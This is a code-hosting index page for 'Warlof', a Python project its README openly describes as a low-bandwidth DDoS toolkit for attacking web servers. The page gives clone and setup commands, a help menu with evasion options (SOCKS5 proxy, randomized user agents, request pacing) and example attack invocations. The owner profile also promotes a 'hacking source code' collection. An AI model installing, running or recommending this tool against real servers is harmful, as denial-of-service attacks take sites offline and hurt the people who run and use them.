Science Score: 44.0%

This score indicates how likely this project is to be science-related based on various indicators:

  • CITATION.cff file
    Found CITATION.cff file
  • codemeta.json file
    Found codemeta.json file
  • .zenodo.json file
    Found .zenodo.json file
  • DOI references
  • Academic publication links
  • Academic email domains
  • Institutional organization owner
  • JOSS paper metadata
  • Scientific vocabulary similarity
    Low similarity (5.2%) to scientific vocabulary
Last synced: 6 months ago · JSON representation ·

Repository

Basic Info
  • Host: GitHub
  • Owner: Transmetal
  • License: gpl-3.0
  • Language: Python
  • Default Branch: main
  • Size: 278 KB
Statistics
  • Stars: 0
  • Watchers: 1
  • Forks: 0
  • Open Issues: 0
  • Releases: 0
Created over 3 years ago · Last pushed over 3 years ago
Metadata Files
Readme License Citation

README.md


Warlof

Low Bandwidth Distributed Denial-of-service attack ToolKit.


Warlof is a Low Bandwidth Distributed Denial-of-service attack (DDoS) Toolkit. You can use it to attack on a web server with multiple sockets. You can customize how many requests you wanna send.


Main Features

  • DDoS Attack
  • Send request in HTTPS also.
  • Advance Error Handeling.
  • Customize request numbers.
  • Multiprocessing support


Documentation

install

yaml git clone https://github.com/Transmetal/warlof-main cd warlof bash setup.sh python3 warlof.py --help

Usage

```yaml ┌──(habib㉿kali)-[~/Desktop/warlof] └─$ python3 warlof.py -h

         __       __                                                                                                
        (, )  |  /         /)    /)                                                                                 
           | /| / _   __  // ___//                                                                                  
           |/ |/ (_(_/ (_(/_(_)/(_                                                                                  
           /  |               /)                                                                                    
                             (/                                                                                     
          @thenurhabib                                                                                              

~ Low Bandwidth Denial-of-service attack (DDOS) Toolkit ~

usage: ⏬⏬

Warlof - Help Menu

positional arguments: host - Domain Name or IP Address.

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Domain/IP Port Number
-s SOCKETS, --sockets SOCKETS
Number of Requests.
-v, --verbose Show attack details in terminal.
-x, --useproxy Use SOCKS5 proxy for connecting.
--proxy-host PROXYHOST
SOCKS5 proxy host.
--proxy-port PROXY
PORT
SOCKS5 proxy port
--https Use HTTPS for the requests.
-ua, --randuseragents
Randomizes user-agents with requests.
--sleeptime SLEEPTIME
Sleep time for every request..

```

Example

bash python3 warlof.py example.com python3 warlof.py example.com -v python3 warlof.py example.com -p 80 python3 warlof.py example.com --https python3 warlof.py example.com --sleep 5


Owner

  • Name: Transmetal
  • Login: Transmetal
  • Kind: user

Hacking Source Code Collector ; how to use (ex.) ; git clone https://github.com/Transmetal/direct ; ls ; cd direct ; python3 direct.py ; ./direct.sh

Citation (CITATION.cff)

cff-version: 1.0.0
message: "If you use this software, please cite it as below."
authors:
  - given-names: Md. Nur habib
    family-names: Habib
    email: thenurhabib@gmail.com
    affiliation: The Hacker's Choice
title: "warlof"
version: 1.0.0
type: CLI software
url: "https://github.com/thenurhabib/warlof"
keywords:
  - ddos
  - dos
  - hacking
  - pentesting
  - securiy
  - attack
license: The GNU General Public License v3.0

GitHub Events

Total
Last Year